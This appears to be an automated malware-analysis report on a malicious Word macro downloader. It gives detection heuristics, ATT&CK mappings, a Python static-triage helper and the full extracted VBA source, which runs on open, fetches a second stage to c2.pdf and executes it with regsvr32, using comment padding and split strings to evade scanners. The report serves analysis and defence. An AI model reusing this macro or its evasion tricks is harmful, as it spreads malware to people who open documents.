Verdict: MALICIOUS
Risk Score: 210

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1105 Ingress Tool Transfer
- T1218.010 System Binary Proxy Execution: Regsvr32 (mapped from the Shell command reconstructed below: the constants wu = "reg" and bn = "svr" plus the literal "32 c2.pdf" yield regsvr32 c2.pdf)
The sample is a malicious Word document (OOXML, with the macro code in word/vbaProject.bin) whose VBA project acts as a downloader. The autoopen subroutine runs when the document is opened. It first reads the payload URL from the document's last CustomXMLPart (SelectNodes("//Items")(1).ChildNodes(2).Text), so the URL never appears in the macro source and is invisible to macro-only extraction such as olevba. It passes that URL to frm.download, a one-line wrapper around URLDownloadToFile (declared in module e, with a PtrSafe variant for 64-bit Office), which saves the response as c2.pdf; the relative filename means the file lands in Word's current working directory. Finally it runs Shell wu & bn & "32 c2.pdf"; with wu = "reg" and bn = "svr" this is regsvr32 c2.pdf, so the .pdf extension is a disguise and the second stage is a DLL whose DllRegisterServer export regsvr32 will call. The split constants, the empty decoy procedures q2 and e4, and the long runs of random-word comment lines are padding intended to defeat simple string matching and make the live code harder to spot.
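Two things an analyst has to do by hand on this sample are resolving the split constants in the Shell call and recovering the value the macro reads from the CustomXMLPart, which olevba cannot show because it lives in customXml/itemN.xml rather than in the VBA project. The following is an added worked example, not code from the report or from any tool named on this page. The VBA fragment and the custom XML part are constructed to mirror the sample; only "//Items", the match index 1 and the child index 2 come from the macro, so the <Item> element name, the decoy first child and the URL itself are assumptions.

```python
"""Static triage helpers for a regsvr32-style VBA downloader (added example).

Reproduces two manual steps on the sample above:
  1. resolve String constants split across modules so that
     Shell wu & bn & "32 c2.pdf" becomes the real command line;
  2. emulate SelectNodes(xpath)(i).ChildNodes(j).Text against the
     customXml part the macro reads its URL from. Office collections
     are 1-based, so ChildNodes(2) is the second child element.
Inputs below are CONSTRUCTED; the real document's customXml part is not
on the page, so the <Item> element name and the decoy first child are
assumptions.
"""
import re
import xml.etree.ElementTree as ET

# Constructed: only the live lines of the sample's modules, padding removed.
VBA_SOURCE = r'''
Public Const wu As String = "reg"
Public Const bn As String = "svr"
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal a As LongPtr, ByVal u As String, ByVal f As String, ByVal r As LongPtr, ByVal c As LongPtr) As Long
Sub autoopen()
n = ActiveDocument.CustomXMLParts(ActiveDocument.CustomXMLParts.Count).SelectNodes("//Items")(1).ChildNodes(2).Text
frm.download n, "c2.pdf"
Shell wu & bn & "32 c2.pdf"
End Sub
'''

# Constructed customXml part. Assumed shape: <Items> with element children,
# the second of which carries the URL (payload.invalid is a placeholder host).
CUSTOM_XML = '''<Items>
  <Item>decoy text</Item>
  <Item>http://payload.invalid/c2.pdf</Item>
</Items>'''

CONST_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Const\s+(\w+)\s+As\s+String\s*=\s*"([^"]*)"',
    re.M | re.I)
# Matches "Shell <expr>", "Call Shell(<expr>)" and "Shell(<expr>)" on one line.
SHELL_RE = re.compile(r'^\s*(?:Call\s+)?Shell\s*\(?\s*(.+?)\s*\)?\s*$', re.M | re.I)
XPATH_RE = re.compile(r'SelectNodes\("([^"]+)"\)\((\d+)\)\.ChildNodes\((\d+)\)\.Text')


def collect_consts(src):
    """Map lower-cased constant names to their string values (VBA is case-insensitive)."""
    return {m.group(1).lower(): m.group(2) for m in CONST_RE.finditer(src)}


def resolve_expr(expr, consts):
    """Evaluate a VBA string expression of literals and constants joined by '&'.

    Limitation: a '&' inside a string literal is not handled; none appears here.
    """
    expr = re.sub(r',\s*\w+\s*$', '', expr)  # drop an optional WindowStyle argument
    parts = []
    for tok in (t.strip() for t in expr.split('&')):
        if len(tok) >= 2 and tok[0] == tok[-1] == '"':
            parts.append(tok[1:-1])
        elif tok.lower() in consts:
            parts.append(consts[tok.lower()])
        else:
            raise ValueError(f'unresolved token {tok!r}')
    return ''.join(parts)


def recover_shell_commands(src):
    """Return every Shell command line in src with constants substituted."""
    consts = collect_consts(src)
    return [resolve_expr(m.group(1), consts) for m in SHELL_RE.finditer(src)]


def custom_xml_value(xml_text, xpath='//Items', match_index=1, child_index=2):
    """Emulate SelectNodes(xpath)(match_index).ChildNodes(child_index).Text.

    Only the '//tag' form of XPath is supported; the root element counts as a
    match. Assumes element children only (no interleaved text nodes).
    """
    root = ET.fromstring(xml_text.strip())
    tag = xpath.rsplit('/', 1)[-1]
    matches = ([root] if root.tag == tag else []) + root.findall(f'.//{tag}')
    node = matches[match_index - 1]
    children = list(node)
    return (children[child_index - 1].text or '').strip()


def triage(src, custom_xml):
    """Combine the checks into the findings an analyst wants from this sample."""
    findings = {
        'autoopen': bool(re.search(r'^\s*Sub\s+autoopen\b', src, re.M | re.I)),
        'declares_urldownloadtofile': bool(re.search(
            r'Declare\s+(?:PtrSafe\s+)?Function\s+URLDownloadToFile', src, re.I)),
        'shell_commands': recover_shell_commands(src),
        'custom_xml_value': None,
    }
    m = XPATH_RE.search(src)
    if m:
        findings['custom_xml_value'] = custom_xml_value(
            custom_xml, m.group(1), int(m.group(2)), int(m.group(3)))
    return findings


if __name__ == '__main__':
    for key, value in triage(VBA_SOURCE, CUSTOM_XML).items():
        print(f'{key}: {value}')
```

On the real document the customXml/itemN.xml parts are plain files inside the .docx zip; the macro uses CustomXMLParts.Count, so the last part in that collection is the one to feed to custom_xml_value.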
Heuristics (6)

- ClamAV: Doc.Downloader.GreenBox5-9139204-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.GreenBox5-9139204-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): the document contains a VBA project; VBA macros are present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched lines in script:
    ' Sandwich chancellor epa lassitude reference
    Shell wu & bn & "32 c2.pdf"
    End Sub
- URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD). Matched lines in script:
    #If VBA7 And Win64 Then
    Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal Iy As LongPtr, ByVal jh As String, ByVal lq As String, ByVal R As LongPtr, ByVal H As LongPtr) As Long
    #Else
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched lines in script:
    End Function
    Sub autoopen()
    n = ActiveDocument.CustomXMLParts(ActiveDocument.CustomXMLParts.Count).SelectNodes("//Items")(1).ChildNodes(2).Text
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL in this list is a standard Office Open XML, DrawingML or markup-compatibility namespace identifier, not a network indicator; the actual download URL is read at run time from a CustomXMLPart and is not present in the macro source, so none of these entries should be treated as C2.
    - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
    - http://schemas.microsoft.com/office/drawing/2014/chartex (referenced by macro)
    - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (referenced by macro)
    - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (referenced by macro)
    - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (referenced by macro)
    - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (referenced by macro)
    - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (referenced by macro)
    - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (referenced by macro)
    - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (referenced by macro)
    - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (referenced by macro)
    - http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
    - http://schemas.microsoft.com/office/drawing/2016/ink (referenced by macro)
    - http://schemas.microsoft.com/office/drawing/2017/model3d (referenced by macro)
    - http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
    - http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
    - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
    - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
    - http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
    - http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
    - http://schemas.microsoft.com/office/word/2012/wordml (referenced by macro)
    - http://schemas.microsoft.com/office/word/2018/wordml/cex (referenced by macro)
    - http://schemas.microsoft.com/office/word/2016/wordml/cid (referenced by macro)
    - http://schemas.microsoft.com/office/word/2018/wordml (referenced by macro)
    - http://schemas.microsoft.com/office/word/2015/wordml/symex (referenced by macro)
    - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
    - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
    - http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
    - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3875 bytes | 0588ff700fd7219be98e79cf721c72f7b538f0e6a1f59213a3676365f6ede2b4 |

Preview of macros.bas (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "nb"
Function q2(D)
' Maori montreal oakland render
' Reindeer engaged
' Concur
' Individually qualifying
' Efficiently moat superlative downloaded
' Displaying forearm ap magazine funeral
' Neigh
' Controllers largely truant
' Who repentant tepid thirty-one
' Ll
' Muff phases boxer functional
' Film conventions legate insidiously robot shanty
' Magic
' Mimic yours
' Weakening packet beverage guarantees brandon disturbed go-between knob
' Chosen up related
' Delegation key
' Proletariat query veterans collectors
' Legend ron souls
End Function
Sub autoopen()
n = ActiveDocument.CustomXMLParts(ActiveDocument.CustomXMLParts.Count).SelectNodes("//Items")(1).ChildNodes(2).Text
' Horny sealed
' Vodka evaluating
' Mesquite good tutelary
' Receiver
' Lisa
frm.download n, "c2.pdf"
' Corporations obtrude pm crispin
' Firewood fiction variance deg systematically
' Norwegian ratification
' Ebook storm liabilities
' Supplier consisting affront
' Tumults earthenware
' Countryside sm compression parochial edgar
' Largesse islamic
' Enterprises navel camcorder
' Larva cruiser
' Shop expiring hygiene
' Catholic barrage squash disdainful devices
' Readily
' Grandparents stylish
' Monogram creased
' Nice estuary abbreviations bookmarks
' Sandwich chancellor epa lassitude reference
Shell wu & bn & "32 c2.pdf"
End Sub
Attribute VB_Name = "nb1"
Sub e4()
' Propose
' Bali articulate
' Piedmontese follower madonna hoary
' Degenerate
' Number candidacy
' Added examiner
' Resentful thehun interrogate toilette
' Heart-rending weekends
' Harmonize ambien
' Sake africa
' Applaud proportional bali
' Brabant
' Wayne
' Ideas lige
' Prix themselves dimmer
' Begrudge conceptual killed regional
' Suggestions halfway edge
' Stepdaughter dunbar adelaide addition
' Sawn moat rain blocks
' Ventures assembled
' Overdone lenses
' Hypocritical cherry
' Enterprise
' Necklace contumely invitations everyone laconic
' Responsibilities katrina adventure incentive
' Oreilly puzzle treasury placard guano electron
' Emails gratis bestial
' Serious
' Partridge menagerie collector charts traditionary
' Guards emit starting glen
' Maidenhead recipe
' Saucer childbirth subaltern
' Mole integration
' Immorality unreliable recipients
' St allows else eileen
' Db bird died
' Scapegoat essay pj wordy
' Herbs freshmen
' Indebtedness asthma
' Supercilious thaw athletics overcome hunter
' Merge xp
' Discontinued dionysius
' Louse locomotive mastiff crown singer
' Excommunication furtive
End Sub
Attribute VB_Name = "e"
Public Const wu As String = "reg"
Public Const bn As String = "svr"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal Iy As LongPtr, ByVal jh As String, ByVal lq As String, ByVal R As LongPtr, ByVal H As LongPtr) As Long
#Else
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA"(ByVal Iy As Long, ByVal jh As String, ByVal lq As String, ByVal R As Long, ByVal H As Long) As Long
#End If
Attribute VB_Name = "frm"
Attribute VB_Base = "0{6B8018BF-9C83-4DBE-B9EB-D31245ABD666}{86009E6C-7117-4726-AED7-DEA04D3B7763}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub download(url, file)
URLDownloadToFile 0, url, file, 0, 0
End Sub
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 27136 bytes | 5980f6b57acd5a407f0bf444bb9caee1923ea97e8b22c72701b419e017280e6e |